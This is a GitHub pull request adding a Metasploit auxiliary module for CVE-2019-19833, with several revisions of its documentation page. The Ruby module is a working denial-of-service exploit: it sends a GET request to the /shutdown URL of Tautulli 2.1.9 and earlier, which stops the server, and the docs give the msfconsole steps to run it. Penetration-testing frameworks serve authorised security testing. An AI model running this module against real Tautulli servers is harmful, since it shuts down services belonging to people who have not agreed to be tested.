### PR TITLE
add exploit module tautulli_shutdown_exec [ CVE-2019-19833 ]

### DIFF
--- a/documentation/modules/auxiliary/dos/http/tautulli_shutdown_exec.md
+++ b/documentation/modules/auxiliary/dos/http/tautulli_shutdown_exec.md
@@ -7,7 +7,6 @@ Tautulli versions 2.1.9 and prior are vulnerable to denial of service via the /s
 
 ## Verification Steps :
 
-
 List the steps needed to make sure this thing works
 
 1. Start ```msfconsole```

--- a/documentation/modules/auxiliary/dos/http/tautulli_shutdown_exec.md
+++ b/documentation/modules/auxiliary/dos/http/tautulli_shutdown_exec.md
@@ -7,11 +7,10 @@ Tautulli versions 2.1.9 and prior are vulnerable to denial of service via the /s
 
 ## Verification Steps :
 
-```
+
 List the steps needed to make sure this thing works
 
 1. Start ```msfconsole```
 2. ```use auxiliary/dos/http/tautulli_shutdown_exec```
 3. ```set RHOSTS XXX.XXX.XXX.XXX```
 4. ```run```
-```

--- a/documentation/modules/auxiliary/dos/http/tautulli_shutdown_exec.md
+++ b/documentation/modules/auxiliary/dos/http/tautulli_shutdown_exec.md
@@ -15,16 +15,18 @@ Platform: Windows 10 (10.0.18362)
 Python Version: 2.7.11 (v2.7.11:6d1b6a68f775, Dec 5 2015, 20:40:30) [MSC v.1500 64 bit (AMD64)]
 ```
 
-## Using
+### Verification Steps :
 
 ```
-msfconsole -q
-use auxiliary/dos/http/tautulli_shutdown_exec
-set RHOSTS XXX.XXX.XXX.XXX
-exploit
+List the steps needed to make sure this thing works
+
+1. Start ```msfconsole```
+2. ```use auxiliary/dos/http/tautulli_shutdown_exec```
+3. ```set RHOSTS XXX.XXX.XXX.XXX```
+4. ```run```
 ```
 
-## References :
+### References :
 
 CVE:2019-19833
 EDB:47785

--- a/documentation/modules/auxiliary/dos/http/tautulli_shutdown_exec.md
+++ b/documentation/modules/auxiliary/dos/http/tautulli_shutdown_exec.md
@@ -1,5 +1,3 @@
-# Tautulli 2.1.9 - Shutdown Denial of Service
-
 ## Overview
 Tautulli versions 2.1.9 and prior are vulnerable to denial of service via the /shutdown URL.
 

--- a/documentation/modules/auxiliary/dos/http/tautulli_shutdown_exec.md
+++ b/documentation/modules/auxiliary/dos/http/tautulli_shutdown_exec.md
@@ -1,0 +1,30 @@
+# Tautulli 2.1.9 - Shutdown Denial of Service
+
+## Overview
+Tautulli versions 2.1.9 and prior are vulnerable to denial of service via the /shutdown URL.
+
+## Affected System Information :
+
+```
+Date: 2018-12-17 
+Exploit Author: Ismail Tasdelen
+Vendor Homepage: https://tautulli.com/
+Software : https://github.com/Tautulli/Tautulli
+Product Version: v2.1.9
+Platform: Windows 10 (10.0.18362)
+Python Version: 2.7.11 (v2.7.11:6d1b6a68f775, Dec 5 2015, 20:40:30) [MSC v.1500 64 bit (AMD64)]
+```
+
+## Using
+
+```
+msfconsole -q
+use auxiliary/dos/http/tautulli_shutdown_exec
+set RHOSTS XXX.XXX.XXX.XXX
+exploit
+```
+
+## References :
+
+CVE:2019-19833
+EDB:47785

--- a/documentation/modules/auxiliary/dos/http/tautulli_shutdown_exec.md
+++ b/documentation/modules/auxiliary/dos/http/tautulli_shutdown_exec.md
@@ -3,7 +3,7 @@
 ## Overview
 Tautulli versions 2.1.9 and prior are vulnerable to denial of service via the /shutdown URL.
 
-## Affected System Information :
+## Vulnerable Application :
 
 ```
 Date: 2018-12-17 

--- a/documentation/modules/auxiliary/dos/http/tautulli_shutdown_exec.md
+++ b/documentation/modules/auxiliary/dos/http/tautulli_shutdown_exec.md
@@ -1,19 +1,11 @@
 ## Overview
 Tautulli versions 2.1.9 and prior are vulnerable to denial of service via the /shutdown URL.
 
-## Vulnerable Application :
+## Scenario
 
-```
-Date: 2018-12-17 
-Exploit Author: Ismail Tasdelen
-Vendor Homepage: https://tautulli.com/
-Software : https://github.com/Tautulli/Tautulli
-Product Version: v2.1.9
-Platform: Windows 10 (10.0.18362)
-Python Version: 2.7.11 (v2.7.11:6d1b6a68f775, Dec 5 2015, 20:40:30) [MSC v.1500 64 bit (AMD64)]
-```
+![72550314-80cd8a00-38a3-11ea-9bad-942668a29390](https://user-images.githubusercontent.com/15425071/72602337-29bdc880-3928-11ea-8aec-ddadb3ff4f2d.png)
 
-### Verification Steps :
+## Verification Steps :
 
 ```
 List the steps needed to make sure this thing works
@@ -23,8 +15,3 @@ List the steps needed to make sure this thing works
 3. ```set RHOSTS XXX.XXX.XXX.XXX```
 4. ```run```
 ```
-
-### References :
-
-CVE:2019-19833
-EDB:47785

--- a/documentation/modules/auxiliary/dos/http/tautulli_shutdown_exec.md
+++ b/documentation/modules/auxiliary/dos/http/tautulli_shutdown_exec.md
@@ -1,5 +1,6 @@
-## Overview
-Tautulli versions 2.1.9 and prior are vulnerable to denial of service via the /shutdown URL.
+## Vulnerable Application
+Tautulli versions 2.1.9 and prior are vulnerable to denial of service via the `/shutdown` URL in applications that do
+not have a user login area enabled.
 
 ## Scenario
 

--- a/modules/auxiliary/dos/http/tautulli_shutdown_exec.rb
+++ b/modules/auxiliary/dos/http/tautulli_shutdown_exec.rb
@@ -1,0 +1,38 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize
+    super(
+      'Name'        => 'Tautulli v2.1.9 - Shutdown Denial of Service',
+      'Description' => 'Tautulli versions 2.1.9 and prior are vulnerable to denial of service via the /shutdown URL.',
+      'Author'      => 'Ismail Tasdelen',
+      'License'     => MSF_LICENSE,
+      'References'  =>
+      [
+        ['CVE', '2019-19833'],
+        ['EDB', '47785']
+      ]
+    )
+    register_options([ Opt::RPORT(8181) ])
+  end
+
+  def run
+    res = send_request_raw({
+      'method' => 'GET',
+      'uri' => '/shutdown'
+    })
+
+    if res
+      print_status("Request sent to #{rhost}")
+    else
+      print_status("No reply from #{rhost}")
+    end
+  rescue Errno::ECONNRESET
+    print_status('Connection reset')
+  end
+end


### PR DESCRIPTION
Tell us what this change does. If you're fixing a bug, please mention
the github issue number.

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] `use auxiliary/dos/http/tautulli_shutdown_exec`
- [x] `set RHOSTS XXX.XXX.XXX.XXX`
- [x] `run`

## PoC

![72550314-80cd8a00-38a3-11ea-9bad-942668a29390](https://user-images.githubusercontent.com/15425071/72602337-29bdc880-3928-11ea-8aec-ddadb3ff4f2d.png)